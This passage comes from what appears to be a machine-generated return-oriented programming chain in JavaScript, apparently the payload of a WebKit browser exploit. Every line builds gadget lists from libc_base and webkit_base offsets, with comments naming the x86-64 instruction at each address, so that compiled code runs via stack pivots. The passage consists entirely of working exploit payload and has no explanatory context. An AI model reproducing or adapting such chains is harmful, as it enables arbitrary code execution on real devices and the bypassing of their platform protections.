libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L10164:
ropchain+471936, //L10163
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+296568, //__ntoa_long_long
//L10163:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967216, 4294967295]); // -0x50
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+472008, //L10165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10165:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10167:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+472088, //L10169
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10169:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+488152, //L10168
//L10048:
libc_base+764760, //pop rsi
ropchain+472152, //L10171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10171:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10173:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+472272, //L10176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+472256, //L10174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10174:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10176:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+472448, //L10179
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+472464, //L10180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+472416, //L10177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+472432, //L10178
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10177:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10178:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10179:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10180:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+472560, //L10182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+472544, //L10181
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10181:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10182:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10183:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10184:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L10185:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+472760, //L10187
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10187:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+472816, //L10188
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10188:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+472952, //L10192
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+472936, //L10191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10190:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10191:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10192:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+473088, //L10195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+473120, //L10197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+473072, //L10194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10194:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10195:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10196:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10197:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+473232, //L10198+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+473224, //L10198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L10198:
db([0, 0]); // 0x0
set_gadgets([
ropchain+473248, //L10198+24
ropchain+477768, //L10193
libc_base+764760, //pop rsi
ropchain+473288, //L10199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10199:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10201:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+473408, //L10204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+473392, //L10202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10202:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10204:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+473584, //L10207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+473600, //L10208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+473552, //L10205
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+473568, //L10206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10205:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10206:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10207:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10208:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+473696, //L10210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+473680, //L10209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10209:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10210:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+473776, //L10211
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10211:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10213:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+473896, //L10216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+473880, //L10214
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10214:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10216:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+474072, //L10219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+474088, //L10220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+474040, //L10217
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+474056, //L10218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10217:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10218:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10219:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10220:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+474184, //L10222
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+474168, //L10221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10221:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10222:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+474264, //L10223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10223:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10225:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+474384, //L10228
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+474368, //L10226
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10226:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10228:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+474560, //L10231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+474576, //L10232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+474528, //L10229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+474544, //L10230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10229:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10230:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10231:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10232:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+474672, //L10234
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+474656, //L10233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10233:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10234:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+474752, //L10235
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10235:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10237:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+474872, //L10240
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+474856, //L10238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10238:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10240:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+475048, //L10243
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+475064, //L10244
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+475016, //L10241
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+475032, //L10242
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10241:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10242:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10243:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10244:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+475224, //L10248
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+475192, //L10246
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+475208, //L10247
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10245:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10246:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10247:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10248:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+475328, //L10250
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+475312, //L10249
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10249:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10250:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10251:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10252:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+475496, //L10253
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10253:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10255:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+475616, //L10258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+475600, //L10256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10256:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10258:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+475776, //L10262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+475728, //L10259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+475744, //L10260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10259:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10260:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10261:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L10262:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+475832, //L10263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10263:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10265:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+475952, //L10266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+475968, //L10268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10266:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10268:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+476112, //L10271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+476080, //L10269
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+476096, //L10270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10269:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10270:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10271:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+476192, //L10272
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10272:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10274:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+476312, //L10277
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+476296, //L10275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10275:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10277:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+476456, //L10280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+476424, //L10278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+476440, //L10279
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10278:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10279:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10280:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+476536, //L10281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10281:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10283:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+476656, //L10286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+476640, //L10284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10284:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10286:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+476800, //L10289
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+476768, //L10287
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+476784, //L10288
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10287:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10288:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10289:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+476880, //L10290
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10290:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10292:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+477000, //L10295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+476984, //L10293
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10293:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10295:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+477144, //L10298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+477112, //L10296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+477128, //L10297
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10296:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10297:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10298:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+477224, //L10299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10299:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10301:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+477344, //L10304
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+477328, //L10302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10302:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10304:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+477488, //L10307
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+477456, //L10305
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+477472, //L10306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10305:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10306:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10307:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L10309:
ropchain+477592, //L10308
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+275424, //__ntoa_long
//L10308:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967216, 4294967295]); // -0x50
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+477664, //L10310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10310:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10312:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+477744, //L10314
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10314:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+488152, //L10313
//L10193:
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10316:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10318:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+477904, //L10321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
